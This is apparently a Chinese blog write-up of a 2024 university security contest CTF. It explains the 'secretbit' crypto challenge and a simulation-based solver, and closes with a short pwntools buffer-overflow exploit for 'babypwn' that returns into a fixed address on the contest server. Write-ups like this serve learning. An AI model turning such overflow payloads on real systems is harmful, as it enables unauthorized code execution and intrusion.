naby

导航

高校网络安全管理运维赛2024

前言

只想写这题,其他题基本都没做出来,真的太菜了

做出来的题:签到、钓鱼邮件1,2、Gataway、easyre、babypwn

secretbit

源码

from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm


def instance(m, n):
    start = list(range(m))
    shuffle(start)
    for i in range(m):
        now = start[i]
        this_turn = False
        for j in range(n-1):
            if now == i:
                this_turn = True
                break
            now = start[now]
        if not this_turn:
            return 0
    return 1


def leak(m, n, times=2000):
    message = [instance(m, n) for _ in range(times)]
    return message


MAX_M = 400
MIN_M = 200
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]
leak_message = []

for bi in tqdm(flag_b):
    while True:
        tmp_m0 = randrange(MIN_M, MAX_M)
        tmp_n0 = randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))
        tmp_m1 = randrange(MIN_M, MAX_M)
        tmp_n1 = randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))
        if abs(tmp_m0-tmp_m1-tmp_n0+tmp_n1) > MAX_M // 5:
            break
    choose_m = tmp_m0 if bi == 0 else tmp_m1
    choose_n = tmp_n0 if bi == 0 else tmp_n1
    leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])

open('data.txt', 'w').write(str(leak_message))

分析:
随机生成两组数,根据flag的每个二进制位进行选择,为0选择第0组,为1选择第1组
选择完成后进行一个2000次的循环,对于每一次循环
创建一个0到m-1的列表,并随机打乱
然后进行m次循环,每次循环迭代n次,直到找到列表下标和对应值相等时结束
如果m次都可以找到则返回1,若有一次找不到则返回0

解题思路:
由于有2000次的判断,且每次判断循环次数跟m和n有关
可以看到次数过多,就想到可以用概率来解
计算实际1出现的概率(就是题目给出的列表)
然后自己计算一次概率,看选择第0组时和选择第1组时的概率哪个更接近实际概率,就可以判断
(由于我不会公式计算,所以就直接调用函数模拟了)

exp:

from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm


def instance(m, n):
    start = list(range(m))  # 0 ~ m-1
    shuffle(start)  # 洗牌
    for i in range(m):
        now = start[i]
        this_turn = False
        for j in range(n-1):
            if now == i:
                this_turn = True
                break
            now = start[now]
        if not this_turn:
            return 0
    return 1
def leak(m, n, times=2000):
    message = [instance(m, n) for _ in range(times)]
    return message
a=  #将data.txt复制过来
real=[]
for i in a:
    c=0
    for j in i[2]:
        c=c+j
    x=leak(i[0][0],i[0][1])
    x1=0
    for j in x:
        x1=x1+j
    y = leak(i[1][0], i[1][1])
    y1 = 0
    for j in y:
        y1 = y1 + j
    if abs(c-x1)<abs(c-y1):
        print(0,end="")
    else :
        print(1,end="")


babypwn

这题直接给exp了

from pwn import *

p=remote("prob07.contest.pku.edu.cn",10007)
p.recvuntil(b'token: ')
token=b'380:MEUCIA53-seknXVpWTyWRjvyzlmmewAMd_JN-5aNYUuPgAP1AiEA7On67hlvgpSP1RD5fCXIwmijARphfpolbrDFqB3L9Zc='
p.sendline(token)

p.recvuntil(b'username:')
payload=b'root'
p.sendline(payload)

p.recvuntil(b'password:')
payload=b'a'*(0x30+0x08)+p64(0x401177)
p.sendline(payload)
p.interactive()

posted on 2024-05-07 12:08  Naby  阅读(189)  评论(1编辑  收藏  举报